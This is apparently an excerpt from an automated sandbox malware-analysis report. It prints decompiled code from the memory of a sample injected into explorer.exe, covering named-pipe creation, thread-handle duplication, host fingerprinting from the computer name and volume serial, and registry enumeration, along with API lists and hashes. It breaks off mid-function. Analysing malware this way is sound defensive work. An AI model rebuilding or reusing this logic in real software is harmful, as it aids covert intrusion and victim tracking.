					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x8abfaa0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x8abfaa0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E1000980C(0x1001e6e0);
					_t64 = E10001A1B( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x8abfaa0
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A4DB(_t48);
				E1000861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x10001c68
0x10001c75
0x10001c77
0x10001c7e
0x10001ce4
0x10001c8b
0x10001c90
0x10001c96
0x10001c9b
0x10001ca1
0x10001ca3
0x10001ca7
0x10001d15
0x10001d17
0x10001d99
0x10001d9f
0x10001d9f
0x10001ca9
0x10001cb1
0x10001cb1
0x10001cbd
0x10001cc3
0x10001cc5
0x00000000
0x00000000
0x10001cc7
0x10001cd1
0x10001cd7
0x10001cdd
0x10001cdf
0x00000000
0x10001cdf
0x10001cab
0x10001caf
0x00000000
0x00000000
0x00000000
0x10001caf
0x10001cee
0x10001cef
0x10001cf0
0x10001cf1
0x10001cf2
0x10001cf7
0x10001d01
0x10001d06
0x10001d0e
0x10001d29
0x10001d2c
0x10001d36
0x10001d41
0x10001d54
0x10001d56
0x10001d58
0x10001d5a
0x10001d5b
0x10001d63
0x10001d64
0x10001d6a
0x10001d10
0x10001d10
0x10001d10
0x10001d6b
0x10001d76
0x10001d79
0x10001d7f
0x10001d85
0x10001d90
0x10001d97
0x00000000

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52

Uniqueness

Uniqueness Score: -1.00%

Function 10001B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10001B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A4BF(_t38, 0);
				while(_t12 < 0) {
					E1000980C( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x8abfaa0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x8abfaa0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E1000980C(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A1B( &_v28, E1000131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009F06(_t48);
				}
				if(_v24 != 0) {
					E10006890( &_v24);
				}
				_t26 =  *0x1001e684; // 0x8abfaa0
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}

0x10001b2d
0x10001b33
0x10001b41
0x10001baf
0x10001b4e
0x10001b53
0x10001b59
0x10001b5e
0x10001b64
0x10001b66
0x10001b6a
0x10001c64
0x10001c64
0x10001b70
0x10001b70
0x10001b7c
0x10001b7c
0x10001b88
0x10001b8e
0x10001b90
0x00000000
0x10001b92
0x10001b92
0x10001b9c
0x10001ba2
0x10001ba8
0x10001baa
0x00000000
0x10001baa
0x10001b72
0x10001b72
0x10001b76
0x00000000
0x00000000
0x00000000
0x00000000
0x10001b76
0x10001b70
0x10001c5d
0x10001c63
0x10001c63
0x10001bb8
0x10001bcc
0x10001bcf
0x10001bd9
0x10001be5
0x10001bef
0x10001bf0
0x10001bf1
0x10001bf2
0x10001bf7
0x10001c00
0x10001c04
0x10001c06
0x10001c07
0x10001c0f
0x10001c10
0x10001c16
0x10001c1b
0x10001c21
0x10001c21
0x10001c26
0x10001c31
0x10001c34
0x10001c3c
0x10001c48
0x10001c4b
0x10001c51
0x10001c56
0x10001c5b
0x00000000

APIs

GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
DuplicateHandle.KERNEL32 ref: 10001BD9

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 448 Parent PID: 2540 explorer.exeCOMMON

Executed Functions

Function 000C31C2, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E000C31C2(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0xde688; // 0xf0000
				_t10 = E000CC292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E000C8604(0x80000); // executed
					 *0xde724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E000CBD10(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0xde674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E000CBC7A( &_v20, _t38); // executed
							_t18 = E000C98EE(E000C32A1, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0xde684; // 0x27bf8f0
							 *((intOrPtr*)(_t22 + 0x30))( *0xde674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0xde674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E000C861A( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}

0x000c31c2
0x000c31c8
0x000c31d8
0x000c31dd
0x000c31df
0x000c31e4
0x000c31f5
0x000c31fa
0x000c3200
0x000c3202
0x000c320b
0x000c3210
0x000c3213
0x000c3215
0x000c3217
0x000c3219
0x000c321a
0x000c321a
0x000c3227
0x000c322a
0x000c322f
0x000c3249
0x000c324f
0x000c3254
0x000c3257
0x000c3263
0x000c3271
0x000c3278
0x000c327a
0x00000000
0x00000000
0x000c327c
0x000c3287
0x000c328a
0x00000000
0x000c3259
0x000c3259
0x000c325f
0x000c328c
0x000c328c
0x000c328d
0x000c3293
0x00000000
0x000c329c
0x000c3257
0x000c3204
0x00000000
0x000c3204
0x00000000

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db7eda31075c865da5e648216ee2e6099e473afadaf18acdaabd6f3b714c174f
Instruction ID: d13159e9ccd9f4dddc0a4346f52e0233d29fb46ca893f90048703841fd8101b3
Opcode Fuzzy Hash: db7eda31075c865da5e648216ee2e6099e473afadaf18acdaabd6f3b714c174f
Instruction Fuzzy Hash: 6D21F8726051119AEB10BBB8EC45FAE37A8EB55374F20432EF525D71D1DE3085008761

Uniqueness

Uniqueness Score: -1.00%

Function 000C5A61, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C5A61(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0xde684; // 0x27bf8f0
				 *((intOrPtr*)(_t2 + 0x108))(1, E000C5A06);
				E000C5631(_t6, _t7); // executed
				return 0;
			}

0x000c5a61
0x000c5a6d
0x000c5a73
0x000c5a7a

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,000C5A06,000C5CE8), ref: 000C5A6D

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: d6f4ad1c99d02ec48078a8cc1cbcb086cbc8fad2bc79094a378f4e47e8bbdcd8
Instruction ID: c73ec1648ac1b9eac1dd2e70802dc4e625edaa9747ea1c085a3dbdbdc41907be
Opcode Fuzzy Hash: d6f4ad1c99d02ec48078a8cc1cbcb086cbc8fad2bc79094a378f4e47e8bbdcd8
Instruction Fuzzy Hash: DBB092742515405BD640AB60CC8AF8C32909B64742F0100A4B2468A0F3CAE0A4C06612

Uniqueness

Uniqueness Score: -1.00%

Function 000C4A0B, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000C4A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0xde688; // 0xf0000
					_t125 =  *0xde68c; // 0x27bfab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E000CBB8D(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E000CB7A8(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E000CB67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000C49C7( &_v1076,  &_v1076, _t206);
					_t141 = E000CD400( &_v1076, E000CC379( &_v1076), 0);
					E000CB88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E000C2C8F(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000C92E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0xde688; // 0xf0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000C91E3(_v1112);
								_t145 = _t130;
								 *0xde740 = _t76;
								 *0xde738 = E000C91E3(_t145);
								L17:
								_push(_t145);
								_t80 = E000C9B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0xdb9ca);
								E000C9F48(0xe); // executed
								E000C9F6C(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E000CA0AB(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E000CA3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E000CA3ED(_t188, _t180, _t208); // executed
								}
								_t87 = E000C980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E000CA0AB(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0xde688; // 0xf0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E000CFC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0xde688; // 0xf0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E000CE23E(_t183);
										}
										E000C52C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0xde688; // 0xf0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E000C109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000C85D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xf0228
									_t153 = _t51;
									L25:
									_t90 = E000C553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0xde688; // 0xf0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E000CC292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0xde684; // 0x27bf8f0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0xde684; // 0x27bf8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E000C861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E000C861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E000CE286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000C95E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E000CBFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000C85D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E000C2BA4( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x000c4a0b
0x000c4a18
0x000c4a23
0x000c4a28
0x000c4a2a
0x000c4a2d
0x000c4a32
0x000c4a35
0x000c4a3f
0x000c4a41
0x000c4a4e
0x000c4a57
0x000c4a57
0x000c4a64
0x000c4a7f
0x000c4a86
0x000c4a88
0x000c4a8d
0x000c4a92
0x000c4a98
0x000c4aa7
0x000c4ac6
0x000c4ac8
0x000c4ace
0x000c4ad4
0x000c4ad9
0x000c4add
0x000c4ae0
0x000c4aea
0x000c4aec
0x000c4aed
0x000c4af8
0x000c4afa
0x000c4afd
0x000c4b02
0x000c4b09
0x000c4b5e
0x000c4b5e
0x000c4b63
0x000c4bca
0x000c4bcf
0x000c4bd1
0x000c4bdb
0x000c4be0
0x000c4be0
0x000c4bf5
0x000c4bfa
0x000c4bfc
0x000c4bff
0x000c4c01
0x00000000
0x00000000
0x000c4c07
0x000c4c11
0x000c4c1a
0x000c4c1f
0x000c4c22
0x000c4c28
0x000c4c2e
0x000c4c36
0x000c4c38
0x000c4c3b
0x000c4c3c
0x000c4c41
0x000c4c44
0x000c4c47
0x000c4c49
0x000c4c4d
0x000c4c4d
0x000c4c52
0x000c4c55
0x000c4c57
0x000c4c5b
0x000c4c5b
0x000c4c62
0x000c4c67
0x000c4c69
0x000c4c6d
0x000c4c6f
0x000c4c75
0x000c4c79
0x000c4c7c
0x000c4c7d
0x000c4c82
0x000c4c85
0x000c4c8a
0x000c4cb2
0x000c4cb8
0x000c4cbf
0x000c4cce
0x000c4cd3
0x00000000
0x000c4cd3
0x000c4cc1
0x00000000
0x000c4c8c
0x000c4c8c
0x000c4c91
0x000c4c98
0x000c4cdd
0x000c4cdd
0x000c4ce4
0x000c4ce8
0x000c4ce9
0x000c4ce9
0x000c4cf3
0x000c4cf8
0x000c4cfb
0x000c4cfc
0x000c4cfe
0x000c4d00
0x000c4d05
0x000c4d0c
0x000c4d4f
0x000c4d0e
0x000c4d13
0x000c4d1b
0x000c4d1f
0x000c4d2a
0x000c4d35
0x000c4d3d
0x000c4d41
0x000c4d49
0x000c4d49
0x000c4d0c
0x000c4d55
0x000c4d58
0x000c4d5a
0x000c4d60
0x000c4d60
0x000c4d62
0x000c4d62
0x00000000
0x000c4d62
0x000c4c9a
0x000c4c9a
0x000c4ca0
0x000c4ca2
0x000c4ca7
0x000c4ca7
0x000c4ca9
0x000c4cd8
0x00000000
0x000c4cd8
0x000c4cab
0x000c4ae4
0x000c4ae4
0x00000000
0x000c4ae4
0x000c4c8a
0x000c4b69
0x000c4b77
0x000c4b8a
0x000c4b8f
0x000c4b95
0x000c4b97
0x000c4baf
0x000c4bb4
0x000c4bbd
0x000c4bc3
0x00000000
0x000c4bc3
0x000c4b9f
0x000c4ba8
0x00000000
0x000c4ba8
0x000c4b0b
0x000c4b11
0x000c4b13
0x000c4b51
0x000c4b53
0x00000000
0x00000000
0x000c4b55
0x000c4b59
0x00000000
0x000c4b59
0x000c4b15
0x000c4b1f
0x000c4b2b
0x000c4b36
0x000c4b3d
0x000c4b47
0x000c4b4c
0x00000000
0x000c4b4c
0x000c4ae2
0x00000000
0x000c4a66
0x000c4a71
0x000c4a77
0x000c4a79
0x000c4d64
0x000c4d64
0x000c4d66
0x000c4d6c
0x000c4d6c
0x00000000
0x000c4a79

APIs

memset.MSVCRT ref: 000C4A2D
lstrcpyW.KERNEL32(00000000,00000000), ref: 000C4D1F
lstrcatW.KERNEL32 ref: 000C4D3D
lstrcatW.KERNEL32 ref: 000C4D41
lstrcatW.KERNEL32 ref: 000C4D49
lstrcpyW.KERNEL32(00000000,00000000), ref: 000C4D4F

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: bbb91f8f85fc09bd0cb59870f16fccdce3466dba909f4f420023db500a225448
Instruction ID: e00079e0afd43232e147177fe6b1363a575de2813d944f784ff1f94eb2fb20e0
Opcode Fuzzy Hash: bbb91f8f85fc09bd0cb59870f16fccdce3466dba909f4f420023db500a225448
Instruction Fuzzy Hash: BE91AC71604300AFE754EB20D896FBE73E9BB84720F14492EF9558B2D2EB74DD048B52

Uniqueness

Uniqueness Score: -1.00%

Function 000CB7A8, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E000CB7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000C95E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000C85D5( &_v16);
				_t33 = E000CC392(_t43);
				E000C9640( &(_t43[E000CC392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E000CC392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E000CD400(_t43, E000CC392(_t43) + _t40, 0);
			}

0x000cb7a8
0x000cb7b1
0x000cb7bd
0x000cb7c3
0x000cb7c5
0x000cb7cd
0x000cb7e0
0x000cb7ef
0x000cb7fa
0x000cb807
0x000cb821
0x000cb826
0x000cb828
0x000cb82f
0x000cb83f
0x000cb850
0x000cb85a
0x000cb862
0x000cb869
0x000cb86c
0x000cb889

APIs

memset.MSVCRT ref: 000CB7C5
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 000CB7E0
lstrcpynW.KERNEL32(?,?,00000100), ref: 000CB7EF
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 000CB821

Part of subcall function 000C9640: _vsnwprintf.MSVCRT ref: 000C965D

lstrcatW.KERNEL32 ref: 000CB85A
CharUpperBuffW.USER32(?,00000000), ref: 000CB86C

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
Instruction ID: 2790561c89e92655b6e37f14f7a47cad77b00b55e4e119700a331dcc1739aec8
Opcode Fuzzy Hash: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
Instruction Fuzzy Hash: 302156B2901218BFE714ABA4DC8AFEE77BCDF54310F10856AF505D6182EE75AF048B64

Uniqueness

Uniqueness Score: -1.00%

Function 000C61B4, Relevance: 7.6, APIs: 5, Instructions: 145
registryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E000C61B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				void* _t53;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t53 = E000C8604(0x3fff); // executed
				_t98 = _t53;
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E000C8604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						RegCloseKey(_v8);
					}
					E000C861A( &_v32, 0x3fff); // executed
					E000C861A( &_v36, 0x800); // executed
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0xde68c; // 0x27bfab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0xde68c; // 0x27bfab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0xde690; // 0x27bfb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
